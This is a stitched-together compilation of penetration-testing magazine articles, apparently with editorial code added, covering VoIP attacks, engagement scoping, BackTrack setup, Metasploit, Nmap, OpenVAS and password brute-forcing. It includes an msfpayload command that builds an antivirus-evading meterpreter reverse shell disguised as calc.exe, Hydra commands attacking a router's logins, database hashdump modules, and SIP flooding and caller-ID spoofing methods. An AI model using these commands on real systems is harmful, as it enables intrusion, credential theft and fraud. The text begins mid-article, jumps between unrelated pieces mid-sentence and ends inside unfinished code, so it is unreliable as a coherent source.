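The following Python is an added example for this edition, not code from the article or from Asterisk: it implements the UAS side of the exchange just shown, using the MD5 digest scheme of RFC 2617 as SIP 2.0 (RFC 3261) uses it without qop, and shows why the nonce matters. In this example the UAS issues a random nonce with a lifetime and accepts each nonce only once, so an Authorization header captured from the wire fails when replayed. The user name, password, realm and URI are constructed (the realm and URI mirror the article's sample); no real secret or real digest is reproduced.

```python
"""
Added example (not from the original article): UAS-side verification of a SIP
Digest response with single-use, expiring nonces.  Credentials are constructed.
"""
import hashlib
import hmac
import os
import re
import time


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def digest_response(username, realm, password, method, uri, nonce):
    """response = MD5( MD5(user:realm:password) ":" nonce ":" MD5(method:uri) )"""
    ha1 = md5_hex("%s:%s:%s" % (username, realm, password))
    ha2 = md5_hex("%s:%s" % (method, uri))
    return md5_hex("%s:%s:%s" % (ha1, nonce, ha2))


_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^",\s]+))')


def parse_digest(header):
    """Parse 'Digest k="v", k=v, ...' (with or without the header name) into a dict."""
    value = header.split(":", 1)[1] if header.split(" ", 1)[0].endswith(":") else header
    value = value.strip()
    if not value.startswith("Digest "):
        raise ValueError("not a Digest header: %r" % header)
    return {k: (quoted or unquoted) for k, quoted, unquoted in _PARAM.findall(value[7:])}


def build_authorization(username, password, method, uri, challenge):
    """UAC side: answer a WWW-Authenticate challenge with an Authorization header."""
    c = parse_digest(challenge)
    resp = digest_response(username, c["realm"], password, method, uri, c["nonce"])
    return ('Authorization: Digest username="%s", realm="%s", nonce="%s", '
            'uri="%s", response="%s", algorithm=MD5'
            % (username, c["realm"], c["nonce"], uri, resp))


class DigestServer:
    """Minimal UAS state: realm, user table and the nonces it has issued."""

    def __init__(self, realm, users, nonce_lifetime=60):
        self.realm = realm
        self.users = dict(users)          # username -> password (constructed)
        self.nonce_lifetime = nonce_lifetime
        self._nonces = {}                 # nonce -> time issued

    def challenge(self, now=None):
        nonce = os.urandom(8).hex()       # unpredictable and never reused
        self._nonces[nonce] = time.time() if now is None else now
        return 'WWW-Authenticate: Digest algorithm=MD5, realm="%s", nonce="%s"' % (self.realm, nonce)

    def verify(self, method, authorization, now=None):
        """True only for a correct response to a nonce this server issued,
        still within its lifetime and not used before."""
        now = time.time() if now is None else now
        p = parse_digest(authorization)
        issued = self._nonces.pop(p.get("nonce"), None)   # single use
        if issued is None or now - issued > self.nonce_lifetime:
            return False
        if p.get("realm") != self.realm or p.get("algorithm", "MD5") != "MD5":
            return False
        password = self.users.get(p.get("username"))
        if password is None:
            return False
        expected = digest_response(p["username"], self.realm, password,
                                   method, p.get("uri", ""), p["nonce"])
        # Constant-time comparison so a wrong response leaks nothing through timing.
        return hmac.compare_digest(expected, p.get("response", ""))


def demo():
    """A registration that succeeds, a replay of the same header, and a wrong
    password.  Returns (accepted, replay_accepted, wrong_password_accepted)."""
    server = DigestServer("asterisk", {"1234": "constructed-secret"})
    uri = "sip:1000@192.168.101.105"
    auth = build_authorization("1234", "constructed-secret", "REGISTER", uri, server.challenge())
    accepted = server.verify("REGISTER", auth)
    replayed = server.verify("REGISTER", auth)
    bad = build_authorization("1234", "wrong-guess", "REGISTER", uri, server.challenge())
    return accepted, replayed, server.verify("REGISTER", bad)


if __name__ == "__main__":
    print(demo())
```

Note that the method is part of HA2, so a response computed for REGISTER is not valid for INVITE on the same nonce, and that nothing here protects the password itself against offline guessing once a challenge/response pair has been captured: that is why the eavesdropping countermeasures earlier in the article matter for authentication as well.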
need significantly longer to establish a connection. Moreover you can flood the PBX with a nonexistent extension, thus making it generate a 404 Not Found just to keep it busy. Figure 17 reports a capture of the packets received by the victim, obtained again by means of Wireshark; you can see that a lot of INVITE Request Messages were sent to the victim.
TEARDOWN is a tool used to terminate a call by sending a BYE Request Message; before using TEARDOWN you must capture a valid SIP OK Response Message in order to use its From and To tags and a valid caller ID value. Figure 18 reports the help output of TEARDOWN.
In order to mitigate DoS attacks, a network administrator can introduce a logical network partition called a Voice VLAN. The basic concept behind the Voice VLAN is that you dedicate a separate VLAN with a separate subnet to voice traffic; this keeps contention between data and voice to a minimum and is easier to manage. Another solution could be a stateful firewall with application inspection capabilities, policy enforcement to limit flooded packets, and out-of-band management, in order to allow the network administrator to respond to network events at the moment of the attack by means of network monitoring.
Spoofing Caller ID
The caller ID is fairly easy to spoof in SIP: you just need to change the From header of the SIP INVITE Request Message. In order to spoof the caller ID several tools can be used, for example SVWAR, a tool already used in a previous section and belonging to the SIPVICIOUS suite. The author's choice for this attack is again INVITEFLOOD, but in this example it is not used to flood the VoIP phone but to fake the Caller ID. Figure 20 shows this kind of attack; as you can see in the picture, INVITEFLOOD sends one INVITE Request Message to the victim in order to spoof a Caller ID (-a spoofed), making the victim's phone ring. Figure 21 reports the spoofed caller ID displayed as the Incoming Call by X-Lite.
Conclusions
The aim of this article was to develop an overview of a reliable VoIP hacking methodology that could be used against a VoIP network. Attack vectors including Information Gathering, Extensions Enumeration, Eavesdropping, Telephone Tampering, Authentication Attacks, Denial of Service and Identity Spoofing are reported and explained by means of real examples accomplished with embedded tools. Moreover, the countermeasures reported in this article should be used by system administrators, penetration testers or network engineers to mitigate possible security threats.
On the Web
Mirko Raimondi obtained his Master's degree in Computer Science from the University
of Milan Computer Science Department. He worked as a Software Engineer at
ITALTEL, an Italian leading company in the telecommunications industry, where he
was the project leader of Netmatch-S Lite Edition, a VoIP Session Border Controller
based on a virtual platform and running on commercial hardware. In the ITALTEL test plant
he built testing scenarios by means of Cisco L2/L3 devices, and he has a
CCNA Security certification in progress. Currently, he works in the automotive industry, where he has
built an audio/video/metadata multiplexer in order to hide GPS data in mov files. He's interested in
VoIP telecommunications, network security, steganography methods and computer forensics. You can
contact him either through LinkedIn: http://it.linkedin.com/pub/mirko-raimondi/14/182/58a or via
e-mail: web.mirk@gmail.com.
OSSTMM: http://www.isecom.org/research/osstmm.html
OWASP: https://www.owasp.org/index.php/OWASP_Testing_Project
Note
OWASP is currently in the process of updating to v4 and has a draft available on its site.
Your agreement will no doubt look different from the ones I have used; it will be a living document and will
change over time. At a minimum I would suggest including the following in any agreement between you and
your client:
Start and End Date
Times the Testing can take place
List of internal contacts
Your contact information
List of Targets
Special Attention Targets
Targets to Exclude
Type of Testing to be Performed along with the Depth of the Engagement
If they want you to Perform Denial of Service Attacks a space to justify it
A Disclaimer about the Possibility of Bringing Down a System(s) or Service(s)
A place for them to release you from damages that may occur
Signature of the Approver and his/her Title
Often when first engaged with clients, they won't have any idea what their options are and in some cases what
they even want tested. So I will explain to them what I can do, and describe different attack vectors and avenues a
malicious person can and will use to try to gain access to their infrastructure. This can take some time and will
usually be very back-and-forth between you and your client, with both sides asking and answering questions.
The first real question I ask is "What is your primary concern?", that is, what are you most concerned with,
or where do you think you have the most risk? Their answer to this question will help you to guide
them throughout the rest of the conversation. Some clients may have just had a breach from the outside,
others may have installed some new piece of network hardware and noticed they have a lot of outbound
connections to countries their employees should have no business need to access, and yet others only want a
test to satisfy compliance. Depending on their answer, I will usually make a recommendation and have them
agree that my recommendation is indeed what they are asking/looking for. Sometimes it will depend on what
they have had tested in the past. If it's a new client, or one that hasn't had a true penetration test in a while, I
will suggest that the test utilize a three-pronged approach, and recommend at a minimum that testing
be performed focusing on the external (from the Internet), internal (user space and server), and web
applications (both Internet accessible and internal).
At times I will have clients say something like "Well, we're not really worried about internal"; this is when I
explain to them what happens when someone spoofs an email from the CEO and sends a malicious PDF
file to their Domain Admin that creates an outbound connection to the attacker's laptop, so that the attacker
then has a direct tunnel into their internal network, and ask what happens if he installs a key-logger on
that admin's machine?
Again the main point here is that the conversation will go back-and-forth and sometimes may involve multiple
conference calls with different people before they decide on what they want tested, and you may have to
explain and give examples about what the attacker is capable of. At the end of the day you are working for the
client, and will want to provide them with the best course of action given their specific needs. The ultimate goal
is to agree upon what is to be done, and have the appropriate person sign off on what you are about to do.
Figure 1. Backtrack_download
Installing Backtrack
I'll start out by assuming you have a Windows machine. The first thing you will need is a way to run the BackTrack
VM. If you don't already have it, head over to VMware's website and download VMware Player; it's free for personal
non-commercial use: http://www.vmware.com/products/player/. VMware Player's installation is very straightforward,
so I won't cover that here. Next you need to download the BackTrack VM from http://www.backtrack-linux.
org/downloads/. There are many different versions and options you can pick when downloading; just make
sure you set your options as follows, as we will be downloading the latest BackTrack 5 R3 (Figure 1).
BackTrack decided to use 7-Zip to compress their file, so if you have an issue extracting the archive you can
download 7-Zip from http://www.7-zip.org/ and use it to extract the VM. Once you have everything downloaded,
installed, and extracted, go ahead and launch VMware Player. The first thing you will need to do before you
play the BackTrack VM is to change a setting or two. Click on Edit virtual machine settings, on the right select
Network Adapter and then on the left change the Network Adapter connection type from NAT to Bridged
and click the Save button so that it looks like Figure 2.
Figure 2. Bridged
Note
The BackTrack virtual machine comes set for 768M of RAM. Depending on the total amount of RAM you
have available on your system you may want to increase that!
Now go ahead and start the BackTrack virtual machine by clicking on Play virtual machine. The first time
you start up any virtual machine you have downloaded or moved from machine to machine, VMware Player
will ask you a question; select the "I copied it" button (Figure 3).
Figure 3. I copied it
When the VM first starts up, if you have any USB or other devices connected it will prompt you
with another message, letting you know that you can connect those devices to the virtual machine; you do
not want to do that here.
Once the BackTrack VM has finished booting you will see a login prompt like the one in Figure 4. The default
login is root and the password is toor.
Figure 4. Login
Once you are at the prompt, go ahead and make sure you have an IP address by typing:
ifconfig
You should see that your DHCP server has handed you an IP address on your local network; if you see
something other than the right subnet for your network, go back and check that you are running
in Bridged mode and not NAT. While things will work with a NATted IP address, if you are trying to exploit
a machine on a real subnet you will have to make changes to your host to pass the traffic back and forth.
The output from the ifconfig command should look like Figure 5. Next start up the window manager
with the command:
startx
Listing 1. Uninstall Metasploit
cd /opt/metasploit
./uninstall
apt-get update
apt-get upgrade -y
cd ~
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run
chmod +x metasploit-latest-linux-installer.run
./metasploit-latest-linux-installer.run --prefix /opt/metasploit --mode unattended
nmap --script-updatedb
With the new version of Metasploit you will need to register in order to get updates.
If you want to register, open up a browser and go to https://localhost:3790.
You will see the screen in Figure 7; click the GET PRODUCT KEY button (Figure 8).
BackTrack comes with a lot of plugins for Firefox; you may need to disable these in order to register!
After you have filled out their form click on the GET FREE LICENSE button.
Once you have registered, in order to update Metasploit, at the command prompt type:
msfupdate
Nmap
Nmap (or Network Mapper) is a security scanner that provides many features for probing computer
networks, such as host discovery, service detection, operating system fingerprinting, and a whole lot more.
Nmap is very powerful and has a ton of options; you can read more about it and all its various options
at http://nmap.org. A full reference of all the switches for Nmap can be found at http://nmap.org/book/man.
html. But I will be showing a few Nmap commands that will help ease your way.
The first command we are going to run will get us a list of all the live hosts on our network and output
those to a file. You could skip this step and simply run the next Nmap command, but it will take a whole
lot longer! We also want to exclude our attack platform, so you will need to know the IP address of your
BackTrack virtual machine along with the IP of your Windows host OS (and any other hosts you don't want
to scan). When the command completes you will have a live_hosts.txt file; let's check it to see what hosts
you found on your network (Figure 10).
nmap -sn -T5 192.168.1.0/24 --exclude 192.168.1.1,192.168.1.115,192.168.1.117 | grep "Nmap scan" | cut -d " " -f5 > live_hosts.txt
cat live_hosts.txt
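The grep/cut pipeline above takes the fifth space-separated field of each "Nmap scan report" line, which is the address only when nmap could not resolve a hostname; when it could, the line reads "Nmap scan report for name (address)" and the fifth field is the name, not the address. The following is an added example, not part of the original article, of a POSIX shell version of the same pipeline that handles both line forms and applies the exclusion list. The sample scan output inside it is constructed for the example, and the function names live_hosts, exclude_hosts and sample_live_hosts are my own, not nmap's.

```shell
#!/bin/sh
# Added example: a more robust version of the live-host pipeline.
# The "nmap -sn" output below is constructed for this example, not a real scan;
# the third host resolved a name, which is the case "cut -d ' ' -f5" gets wrong
# (it would print "fileserver.lan" instead of the address).
SAMPLE_NMAP_SN='Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-01 10:00 UTC
Nmap scan report for 192.168.1.1
Host is up (0.0010s latency).
Nmap scan report for 192.168.1.115
Host is up (0.0020s latency).
Nmap scan report for fileserver.lan (192.168.1.197)
Host is up (0.0015s latency).
Nmap scan report for 192.168.1.200
Host is up (0.0030s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.50 seconds'

# live_hosts: read "nmap -sn" output on stdin and print one IP address per line.
# The address is always the last field of a "Nmap scan report for" line, with or
# without a hostname in front of it, so take $NF and strip the parentheses.
live_hosts() {
    awk '/^Nmap scan report for / { ip = $NF; gsub(/[()]/, "", ip); print ip }'
}

# exclude_hosts LIST: drop the comma-separated addresses in LIST (your attack
# platform and host OS, the same addresses the article passes to --exclude).
exclude_hosts() {
    awk -v skip="$1" '
        BEGIN { n = split(skip, a, ","); for (i = 1; i <= n; i++) drop[a[i]] = 1 }
        !($0 in drop)'
}

# sample_live_hosts: the pipeline run over the constructed sample, joined with
# single spaces so a caller can compare the result as one string.
sample_live_hosts() {
    printf '%s\n' "$SAMPLE_NMAP_SN" \
        | live_hosts \
        | exclude_hosts "192.168.1.1,192.168.1.115" \
        | tr '\n' ' ' | sed 's/ $//'
}

# Live use on BackTrack (the scan itself is the article's command):
#   nmap -sn -T5 192.168.1.0/24 | live_hosts | exclude_hosts "192.168.1.1,192.168.1.115" > live_hosts.txt
sample_live_hosts
echo ""
```

Run on the constructed sample this prints 192.168.1.197 192.168.1.200: the resolved host keeps its address and the two excluded addresses are gone. Using --exclude on the scan itself, as the article does, is still the better choice because those hosts are then never probed at all; the exclude_hosts filter is there for the case where you are re-reading a saved scan.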
Note
I added the --script-args=unsafe=1 option (you didn't use to have to do this, but with the newer versions of
Nmap you otherwise miss quite a bit of exploitable goodness. If you are unsure, you can leave that option out).
Once Nmap fires off, you should see something like Figure 11 appear in your terminal.
Vulnerability Scanning
Next up you will need to identify whether any of these hosts contain vulnerabilities. Vulnerability scanners are
another class of tool that any pentester will be able to use to quickly identify hosts which may be vulnerable
to exploitation. Usually I would start with a vulnerability scanner like Nessus or Core Impact, and then run
an Nmap scan. But for the workflow here, and wanting to give you the ability to use BackTrack with only
free tools so that you can replicate this in your test or home environment, we will be using OpenVAS.
Nessus
Nessus does have a free-for-home-use license and, while I suggest you install it and give it a try, it is limited
in the number of IP addresses that you can scan. The full version basically has no limitations and for the
price can't be beat. Nessus is made by Tenable and can be downloaded from http://www.
tenable.com/products/nessus. Nessus currently has over 50,000 checks for vulnerabilities and you can also
add credentials (if known) for an even deeper analysis.
OpenVAS
There are a few free, open source vulnerability scanners out there; among them is OpenVAS, which can be
found at http://www.openvas.org/. OpenVAS currently has over 30,000 checks, so you get what you pay
for. Another reason we are talking about OpenVAS is that it comes installed on BackTrack. But it does
require a few steps in order to get it up and running.
So let's get OpenVAS set up and configured. Some of these commands will require user input, for instance the
setup of the SSL certificate (but you can just hit Enter on all the prompts), and when creating the Admin user
you will be asked to input a password (Listing 2).
Listing 2. OpenVAS
cd /pentest/misc/openvas
openvas-mkcert
openvas-mkcert-client -n om -i
openvasad -c add_user -n admin -r Admin
openvas-nvt-sync
openvassd
openvasmd --rebuild
openvasmd -p 9390 -a 127.0.0.1
openvasad -a 127.0.0.1 -p 9393
gsad --http-only --listen=127.0.0.1 -p 9392
Once you log in you will see the main page, which looks like Figure 13.
Metasploit
The Metasploit Project was created by HD Moore and is a project which provides information about security
vulnerabilities and aids penetration testing; it's best known for its open-source Metasploit Framework, which is
a tool for developing and executing exploit code. When your Nmap scan has completed, let's go ahead and load
the data into Metasploit. We will first launch Metasploit, then create and connect to a new workspace to work
with, load the Nmap scan results and verify things completed with the hosts command (Listing 3 and Figure 19).
Listing 3. Hosts command
msfconsole
workspace -a my_network
workspace my_network
db_import /root/my_subnet.xml
hosts
If at any time you need help in Metasploit you can issue the help command; also, each command will usually
take the -h option, for example, hosts -h.
A shortcut to running Nmap from the command line is to actually run it from within Metasploit itself;
however, I like to run Nmap from the command line with the -oA switch, which will output in the three
major formats at once. This can be incredibly useful if you need to grep through the Nmap output or
otherwise sort through the output and use that information with other tools. You can, however, issue all the
same commands from within Metasploit; at the command prompt you simply type db_nmap instead of nmap
from the command line, which we just finished.
Metasploit has a LOT of different auxiliary modules and tons of commands, but for this article we obviously
can't cover them all. We will however hit on some of the major commands and give you an understanding
of how to use the tool and some of the most common things you will be doing inside the Metasploit console.
With that in mind, let's take a look at what services were found with Nmap that we have imported.
services
As you can see, Nmap did a really good job of identifying the open ports and what services and versions are
running on those ports (Figure 20).
Let's take a look at the open services on just one of these hosts; for example, we will use 192.168.1.197
(Figure 21).
services 192.168.1.197
You should have been returned a list that looks something like Figure 25, with the module that we were looking for
listed.
Let me take a minute here and explain the difference between an exploit like this MS08 one and the
auxiliary module we loaded and used earlier. Once you have all your required fields set you will execute an
auxiliary module with the run command. An exploit uses the command exploit. But this isn't the only
difference; the main difference between an exploit and an auxiliary module is that an exploit needs a payload
in order to do anything, and there were, what, like 300 payloads available? Each exploit is matched to the
payloads it will work with; not all payloads will work with all exploits. So you will have to identify which
payload you want to use that will work with the particular exploit you are going to use. Once you have
loaded an exploit module you can see which payloads are available to that module with the show payloads
command. Now let's continue....
show payloads
set PAYLOAD windows/meterpreter/reverse_tcp
show options
Ah, now you can see that not only are there required fields for the MS08 module, but there are also
required fields for the payload (Figure 26).
Brute-forcing
Brute-forcing is a technique that repeatedly tries different combinations of usernames and passwords to try
to log into a service or break an encrypted password. There are two basic types of attacks: dictionary and
rainbow tables.
Dictionary attacks can be made using dictionary files or lists of passwords, but brute-force attacks also run
through all combinations of character sets, say 0-9, A-Z, a-z and special characters. If you know the length
and password policy that a company uses it will greatly cut down on the time it takes to crack a password.
For dictionary files, I would suggest searching the Internet. A good starting point would be Skull Security at
http://www.skullsecurity.org/wiki/index.php/Passwords.
Rainbow tables are basically huge files with different character sets that have already been hashed
using all combinations of the set, and will usually crack a password long before a pure brute-force attempt
using dictionaries or non-precomputed hashes. If you're interested in rainbow tables, I strongly recommend
checking out Free Rainbow Tables, where you can download tables which have already been created with many
different character sets available. You can find them at https://www.freerainbowtables.com/.
One final note on passwords you may decrypt or find: users often reuse passwords. Once I find a
password I always add it to my dictionary file. That way, as you continue your test, you can use those
passwords against other hosts and services.
Network Infrastructure
Another item an internal penetration test should cover is the network infrastructure. There are many different
ways to go about testing the infrastructure, including modules inside of Metasploit. All it takes is one older
or misconfigured Cisco device on the network and you can literally have access to every Cisco device on
the network. From there you can do things like turn ports on and off, add your host to a restricted list, and
change and monitor SPAN ports.
Cisc0wn
Daniel Compton over at Common Exploits has created a nice script called Cisc0wn that will make your life
easier. He describes Cisc0wn this way:
Cisc0wn is simply a bash script that pulls various tools and enumeration into one simple command for
ease, so is not really a tool in itself. It doesn't do anything extra that you can't really already do, it just
saves running several different tools and commands and entering the same info over and over. It uses
Metasploit modules and snmpwalk for most of the tasks.
Cisc0wn can be found at http://www.commonexploits.com/?p=503 along with a nice walk-through of how to
use it. I strongly suggest you check it out when you have the time.
VoIP Networks
Many corporations now run VoIP for their phone networks. If it's in scope or you come across a subnet that
has a lot of VoIP devices, don't forget to include these in your tests. Among other things an attacker may be
able to break into a user's voicemail and listen to messages, or perform a man-in-the-middle attack and
actively record users' phone calls.
SIPVicious
SIPVicious is simply defined as "... a set of tools that can be used to audit SIP based VoIP systems. It
currently consists of four tools", and it's basically that, a tool for auditing SIP based VoIP systems. It can
be found at http://code.google.com/p/sipvicious/. If you have never heard of SIPVicious and are unfamiliar
with it, I would also recommend checking out http://blog.sipvicious.org/.
Databases
Databases can be a particularly interesting subject and could very well be an entirely separate article.
Companies store all sorts of information in databases. In some cases everything is open game, but I have had
certain tests where the company stores personally identifiable information, or PII, and said go ahead
and try to exploit the databases, BUT they wanted me to stop at the table level and not actually look at the
contents. This is very important: STOP where the client tells you to. Remember your documentation: you are only
allowed to test what they want you to, and only as deep as they would like.
BackTrack has quite a few tools built in for databases; you can access these by going to Applications >
BackTrack > Vulnerability Assessment > Database Assessment.
Metasploit also has a lot of functionality built around databases; I suggest you start by looking at the auxiliary
modules first.
auxiliary/scanner/mssql/mssql_hashdump
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/mssql/mssql_ping
auxiliary/scanner/mssql/mssql_schemadump
auxiliary/scanner/oracle/oracle_hashdump
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/oracle/sid_brute
auxiliary/scanner/oracle/sid_enum
auxiliary/scanner/http/blind_sql_query
auxiliary/scanner/mysql/mysql_authbypass_hashdump
auxiliary/scanner/mysql/mysql_file_enum
auxiliary/scanner/mysql/mysql_hashdump
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/mysql/mysql_schemadump
auxiliary/scanner/mysql/mysql_version
Camera systems: https://community.rapid7.com/community/metasploit/blog/2012/01/23/video-conferencingand-self-selecting-targets.
Protocol Analysis
At some point you may find yourself needing to look at what's going on on the network, or needing to do some
packet analysis. We're not going to talk about that here, but it is something to be aware of.
Wireshark
Wireshark is "the world's foremost network protocol analyzer. It lets you see what's happening on your
network at a microscopic level. It is the de facto (and often de jure) standard across many industries and
educational institutions", and can be found at www.wireshark.org. Again, this is something else for you to
play with. Fire it up on your test or home network, and I think you'll be surprised at what you see.
Default Passwords
Default installs and configurations are often left with the default username and password. If you come across
a login page to, say, a router, web application, camera system, etc., it's always worth Googling for the specific
device or software (and sometimes version) plus "default password", as you will be surprised how often
someone sets up a device or installs some new software, configures it, then just leaves the default login.
Additionally, if you are having a hard time finding the default, go ahead and look for the setup or installation
guide, since it will let you know whether or not there is a default password. Manufacturers are becoming
more security aware; some no longer ship defaults and instead require the user to input their own
password during initial setup.
Evading Anti-virus
Undoubtedly you will find some machine that you should be able to exploit, but try as you may, you just can't
get it to work! Most likely the culprit will be some type of anti-virus. There are things you can do to get around
AV but again, that's well beyond the scope of this article. With that said, a safe place to start is the Metasploit
Framework; included are the tools msfpayload and msfencode, which allow you to encode your payload with
quite a few different options. You may have to try and try again utilizing different options before you
actually get your payload to bypass the AV. The basic format of the command will look like this:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.115 R | ./msfencode -t exe -x calc.exe -k -o exploit.exe -e x86/shikata_ga_nai -c 5
Reporting
Remember we said earlier that the whole point of penetration testing is not only to find the holes before an
attacker would, but also to deliver a report to your client with actionable items. I create all of my reports by hand.
What I do is show the workflow that I followed during the test and include pictures where needed.
Remember that this report may go through quite a few hands, and you may want to show step by step how
you exploited a specific device, since there may be a technical person who would want to recreate the steps,
or test them again after the vulnerability has been remediated. Another thing I show is the number of overall
vulnerabilities that I was able to identify during a test. If you have a client who performs yearly testing they
may use these numbers as metrics at some point to show that, for example, last year they had 500 critical and
high severity issues, but this year they only have 75.
I always make recommendations based on my test. For instance, I may see that a client is still using Telnet
or FTP, which pass everything (including user credentials) unencrypted and in the clear, and if someone is
sniffing the traffic (remember Wireshark?) they can easily harvest the credentials of any user logging into
those systems.
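The -oA switch mentioned earlier writes a grepable .gnmap file next to the normal and XML output, and that file is the quickest place to pull a finding like the Telnet/FTP one above into a report. The following is an added example, not from the original article, of a POSIX shell function that reads a .gnmap file and lists every open FTP or Telnet service with its version string. The sample scan lines are constructed for the example (not a real scan), and the function names cleartext_findings and sample_cleartext_findings are my own, not nmap's.

```shell
#!/bin/sh
# Added example: list cleartext-credential services from nmap grepable output.
# The sample is constructed, not the output of a real scan. Each Ports: entry
# has the layout "port/state/proto/owner/service/rpcinfo/version/", entries are
# separated by ", " and the columns of a line are separated by tabs.
SAMPLE_GNMAP=$(
    printf '# Nmap 6.01 scan initiated Wed Jan  1 10:00:00 2014 as: nmap -sV -oA my_subnet 192.168.1.0/24\n'
    printf 'Host: 192.168.1.197 (fileserver.lan)\tStatus: Up\n'
    printf 'Host: 192.168.1.197 (fileserver.lan)\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 5.9p1/, 23/open/tcp//telnet//Linux telnetd/\tIgnored State: closed (997)\n'
    printf 'Host: 192.168.1.200 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.9p1/, 443/open/tcp//ssl|http//Apache httpd/\tIgnored State: closed (998)\n'
    printf 'Host: 192.168.1.201 ()\tPorts: 23/filtered/tcp//telnet///, 80/open/tcp//http//nginx 1.2.1/\tIgnored State: closed (998)\n'
    printf '# Nmap done at Wed Jan  1 10:01:30 2014 -- 256 IP addresses (3 hosts up) scanned in 90.00 seconds\n'
)

# cleartext_findings: read grepable output on stdin and print one line per open
# FTP or Telnet service, as "ip port/proto service (version)". Filtered or
# closed ports are skipped, so only services an attacker could actually reach
# are reported.
cleartext_findings() {
    awk '
        /^Host: / && /Ports: / {
            ip = $2                                   # "Host: 192.168.1.197 (name)" -> address
            line = $0
            sub(/.*Ports: /, "", line)                # keep only the port list
            sub(/[ \t]*Ignored State.*$/, "", line)   # drop the trailing summary
            n = split(line, entry, ", ")
            for (i = 1; i <= n; i++) {
                split(entry[i], f, "/")
                port = f[1]; state = f[2]; proto = f[3]; svc = f[5]; ver = f[7]
                if (state == "open" && (svc == "ftp" || svc == "telnet"))
                    printf "%s %s/%s %s (%s)\n", ip, port, proto, svc, (ver == "" ? "no version" : ver)
            }
        }'
}

# sample_cleartext_findings: the check run over the constructed sample.
sample_cleartext_findings() {
    printf '%s\n' "$SAMPLE_GNMAP" | cleartext_findings
}

# Live use after the article's scan: cleartext_findings < my_subnet.gnmap
sample_cleartext_findings
```

On the sample this yields two findings, both on 192.168.1.197 (FTP with vsftpd 2.3.4 and Telnet with Linux telnetd); the filtered Telnet port on 192.168.1.201 is not reported. Each output line carries exactly what the report paragraph above needs: the host, the port, the protocol and the banner, so the remediation recommendation (replace with SSH/SFTP or at least TLS) can be stated per host rather than in the abstract.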
Since I use Nessus and Core Impact, one final thing I include is my scan data in the form of a report.
There may be some system on the network with a vulnerability that I did not get around to exploiting,
or there may be no publicly available exploits. This doesn't mean that there won't be some released in
the future, and I always recommend that these issues be remediated. The great part about a lot of these
reports is that they include links to the original vulnerability along with the fix, and that translates to fewer
questions that I have to answer or follow up on!
Conclusion
Hopefully you have found this article informative and now have a better idea of where to start when
performing penetration tests. Since this was an article for a magazine, with a limited amount
of space, there may have been some things that I couldn't cover in as much depth as I would have liked.
But Google is your friend, and the information is out there. One thing that I touched on but did not go into
detail on is the testing of web applications. That subject alone would have more than tripled the size of this
article. If you are interested in the penetration testing of web applications I would suggest taking a look at
w3af and Burp Suite, which can be found at http://w3af.org/ and http://portswigger.net/burp/.
One final note: you will want to be aware of compliance. Many of your clients will be having a penetration
test done in order to be in compliance with requirements such as PCI-DSS, for an audit, or to meet some
other regulatory or industry standard. If you are engaged for such a test, make sure you know that your
methodology and test plan will meet their compliance needs, as many of them require particular items be
tested in a specific way.
Nick Hensley, having held his CISSP since 2002, is a seasoned Information Security Professional with
12 years of industry experience. He currently manages a team of penetration testers, and performs
penetration and application security testing alongside his team, supporting roughly 150 different clients.
His background covers a broad range of managerial and technical positions. Nick's expertise lies in
Penetration Testing, Computer Forensics, Electronic Discovery, Intrusion Detection and Prevention
Systems, and Security Architecture Design and Implementation. He can be reached via email at
NickHensleyCISSP@gmail.com.
Change any default passwords.
Make intentional typos that only you know.
Do not use the same password for all your systems.
Change your password frequently.
So, now you know the rules. But how do you ensure that your passwords are strong enough and not too
complicated to remember? How can you evaluate the strength of your password? You can use tools in
BackTrack to test your password resilience.
see the bar slowing at 99%. Do not abort, and you will eventually see the following message: Figure 3.
The command string used to attack the router, along with its arguments, is as follows:
hydra -V -l admin -P /root/Desktop/dictionary.txt -t 36 -f -s 80 192.168.1.1 http-get /
So we are essentially telling Hydra to show the username (which in this scenario will only be admin) and password
combination tried every time (-V), to use the username admin (-l; as in most router cases, but if we want, another
dictionary can be used here for usernames), specifying the password file to be used (-P), the number of connections
in parallel tasks (-t), exiting after the first successful crack (-f), the port to be used, 80 (the HTTP port, which is open
as nmap showed earlier), the IP address of the router, 192.168.1.1, and the protocol, http-get (usually it is either get or post).
Notice the character / at the end of the line, which specifies that the login should be attempted at the root page (it is like
saying try the login credentials at index.html). The output we get is shown in Figure 6.
Figure 6. The output of the attempt to crack the password of the router at 192.168.1.1
From what you can see, the password search wasn't really successful, so the program just concludes its
execution. As already stated earlier, keep one basic principle in mind: the greater the variety and size of the
original dictionary, the better the result will be. Let us try a different approach this time by attacking the
router's FTP protocol, using the command string that follows. This time, we tell Hydra to try a null password and
to use the login name as the password in addition to what we did earlier.
hydra -V -l admin -P /root/Desktop/dictionary.txt -e ns -f -s 21 192.168.1.1 ftp
If you are not a command line addict, you can use the GUI version of Hydra. For instance, checking the
parameters will show the same settings as the above command line: Figure 7 and Figure 8.
So to verify that this is indeed true, I will ftp to 192.168.1.1 using admin as username and enti4752 as password.
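The FTP dictionary attack above leaves a very recognisable trace on the server side: a burst of FAIL LOGIN records for one account from one client, followed (when -f stops Hydra on the first hit) by an OK LOGIN from the same client. The following is an added example, not part of the original article, of a POSIX shell function that reads a vsftpd-style log and reports every client that crossed a failure threshold, plus any client that logged in successfully after doing so. The log excerpt is constructed for the example, and the names brute_force_report and sample_vsftpd_log are my own.

```shell
#!/bin/sh
# Added example: spot a dictionary attack against FTP from the server's log.
# sample_vsftpd_log prints a constructed excerpt in vsftpd.log format (not a
# real log): twelve failures for "admin" from one client, one ordinary user who
# mistyped once, then a success for "admin" from the hammering client, which is
# what Hydra's -f (stop on first success) looks like from the server.
sample_vsftpd_log() {
    i=1
    while [ "$i" -le 12 ]; do
        printf 'Wed Jan  1 10:00:%02d 2014 [pid 2%02d] [admin] FAIL LOGIN: Client "192.168.1.50"\n' "$i" "$i"
        i=$((i + 1))
    done
    printf 'Wed Jan  1 10:00:13 2014 [pid 213] [alice] FAIL LOGIN: Client "192.168.1.60"\n'
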